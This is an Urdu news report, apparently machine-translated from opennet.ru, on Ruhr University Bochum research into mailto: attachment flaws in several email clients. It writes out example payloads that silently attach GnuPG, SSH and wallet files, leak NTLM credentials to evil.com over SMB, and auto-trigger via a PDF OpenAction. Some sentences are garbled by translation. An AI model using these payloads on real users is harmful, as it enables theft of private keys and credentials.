روہر یونیورسٹی بوخم (جرمنی) کے محققین
لنکس »
میل کلائنٹس Thunderbird، GNOME Evolution (CVE-2020-11879)، KDE KMail (CVE-2020-11880)، IBM/HCL نوٹس (CVE-2020-4089) اور Pegasus Mail ایک معمولی حملے کا شکار تھے جو آپ کو خود بخود منسلک کرنے کی اجازت دیتا ہے۔ کوئی بھی مقامی فائل، جس کی وضاحت کسی لنک کے ذریعے کی گئی ہے جیسے "mailto:?attach=path_to_file"۔ فائل کو انتباہ ظاہر کیے بغیر منسلک کیا گیا ہے، لہذا خصوصی توجہ کے بغیر، صارف کو یہ محسوس نہیں ہو سکتا کہ خط منسلکہ کے ساتھ بھیجا جائے گا۔
مثال کے طور پر، ایک لنک کا استعمال کرتے ہوئے جیسے "mailto:[ای میل محفوظ]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" آپ خط میں GnuPG سے نجی کلیدیں داخل کر سکتے ہیں۔ آپ کرپٹو والٹس (~/.bitcoin/wallet.dat)، SSH کیز (~/.ssh/id_rsa) اور صارف کے لیے قابل رسائی کسی بھی فائل کے مواد بھی بھیج سکتے ہیں۔ مزید یہ کہ، تھنڈر برڈ آپ کو "attach=/tmp/*.txt" جیسی تعمیرات کا استعمال کرتے ہوئے ماسک کے ذریعے فائلوں کے گروپس کو منسلک کرنے کی اجازت دیتا ہے۔
مقامی فائلوں کے علاوہ، کچھ ای میل کلائنٹس IMAP سرور میں نیٹ ورک اسٹوریج اور راستوں کے لنکس پر کارروائی کرتے ہیں۔ خاص طور پر، IBM Notes آپ کو "attach=\\evil.com\dummyfile" جیسے لنکس پر کارروائی کرتے وقت نیٹ ورک ڈائرکٹری سے فائل منتقل کرنے کی اجازت دیتا ہے، اور ساتھ ہی حملہ آور کے زیر کنٹرول SMB سرور کو لنک بھیج کر NTLM تصدیقی پیرامیٹرز کو روکتا ہے۔ (درخواست موجودہ تصدیقی پیرامیٹرز صارف کے ساتھ بھیجی جائے گی)۔
Thunderbird "attach=imap:///fetch>UID>/INBOX>1/" جیسی درخواستوں پر کامیابی کے ساتھ کارروائی کرتا ہے، جو آپ کو IMAP سرور پر فولڈرز سے مواد منسلک کرنے کی اجازت دیتا ہے۔ اسی وقت، IMAP سے بازیافت کیے گئے پیغامات، OpenPGP اور S/MIME کے ذریعے خفیہ کردہ، بھیجنے سے پہلے میل کلائنٹ کے ذریعے خود بخود ڈکرپٹ ہو جاتے ہیں۔ تھنڈر برڈ کے ڈویلپر تھے۔
تھنڈر برڈ کے پرانے ورژن بھی PGP اور S/MIME پر محققین کی طرف سے تجویز کردہ دو دیگر اٹیک ویریئنٹس کے لیے خطرناک تھے۔ خاص طور پر، تھنڈر برڈ، نیز آؤٹ لک، پوسٹ باکس، ای ایم کلائنٹ، میل میٹ اور R2Mail2، ایک اہم متبادل حملے کے تابع تھے، جس کی وجہ یہ ہے کہ میل کلائنٹ خود بخود S/MIME پیغامات میں منتقل ہونے والے نئے سرٹیفکیٹس کو درآمد اور انسٹال کرتا ہے، جس کی اجازت دیتا ہے۔ حملہ آور صارف کے ذریعہ پہلے سے ذخیرہ شدہ عوامی چابیاں کے متبادل کو منظم کرنے کے لئے۔
دوسرا حملہ، جس کے لیے تھنڈر برڈ، پوسٹ باکس اور میل میٹ حساس ہیں، ڈرافٹ پیغامات کو خودکار طریقے سے محفوظ کرنے کے طریقہ کار کی خصوصیات میں ہیرا پھیری کرتا ہے اور میلٹو پیرامیٹرز کا استعمال کرتے ہوئے، انکرپٹڈ پیغامات کی ڈکرپشن شروع کرنے یا صوابدیدی پیغامات کے لیے ڈیجیٹل دستخط کے اضافے کی اجازت دیتا ہے۔ نتیجہ کی بعد میں حملہ آور کے IMAP سرور پر منتقلی اس حملے میں، سائفر ٹیکسٹ کو "باڈی" پیرامیٹر کے ذریعے منتقل کیا جاتا ہے، اور "میٹا ریفریش" ٹیگ حملہ آور کے IMAP سرور پر کال شروع کرنے کے لیے استعمال ہوتا ہے۔ مثال کے طور پر: ' '
صارف کے تعامل کے بغیر "mailto:" لنکس کو خود بخود پروسیس کرنے کے لیے، خاص طور پر ڈیزائن کردہ PDF دستاویزات استعمال کی جا سکتی ہیں - PDF میں OpenAction ایکشن آپ کو دستاویز کھولتے وقت میلٹو ہینڈلر کو خود بخود لانچ کرنے کی اجازت دیتا ہے:
%PDF-1.5
1 اعتراض
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 اعتراض
<< /Type/Action/S /URI/URI (mailto:?body=——شروع PGP پیغام——[…])>>
endobj
ماخذ: opennet.ru